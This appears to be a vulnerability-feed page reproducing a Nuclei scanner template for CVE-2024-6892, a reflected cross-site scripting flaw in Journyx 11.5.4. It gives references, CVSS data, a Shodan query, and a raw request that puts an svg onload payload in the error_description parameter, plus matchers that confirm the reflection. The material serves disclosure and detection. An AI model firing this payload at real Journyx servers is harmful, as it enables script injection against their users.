漏洞描述
Attackers can craft a malicious link that once clicked will execute arbitrary JavaScript in the context of the Journyx web application.
CVE-2024-6892: Journyx 11.5.4 - Reflected Cross Site Scripting
PoC代码[已公开]
id: CVE-2024-6892
info:
name: Journyx 11.5.4 - Reflected Cross Site Scripting
author: DhiyaneshDk
severity: medium
description: |
Attackers can craft a malicious link that once clicked will execute arbitrary JavaScript in the context of the Journyx web application.
reference:
- https://korelogic.com/Resources/Advisories/KL-001-2024-009.txt
- http://seclists.org/fulldisclosure/2024/Aug/7
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-6892
cwe-id: CWE-81,CWE-79
epss-score: 0.03819
epss-percentile: 0.87695
cpe: cpe:2.3:a:journyx:journyx:11.5.4:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: journyx
product: journyx
shodan-query: html:"Journyx"
tags: cve,cve2024,xss,journyx,seclists
http:
- raw:
- |
GET /jtcgi/r/adlogin/sso?code=1337&state=foobar&id_token=zoinks&error_description=%3Csvg%2fonload%3dprompt(%27document.domain%27)%3E&error=error HTTP/1.1
Host: {{Hostname}}
Accept: */*
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<P>error <B><svg/onload=prompt('document.domain')></B></P>"
- "journyx"
condition: and
case-insensitive: true
- type: word
part: content_type
words:
- "text/html"
# digest: 4b0a00483046022100828e6d086641382d11661b77a88ddfb8cd87c4806303cf0e35b55b7ef890b7d4022100ea5af78522801c9ac0337b301c0f0b05133fe4f43152660c05227fdc8e92cf9c:922c64590222798bb761d5b6d8e72950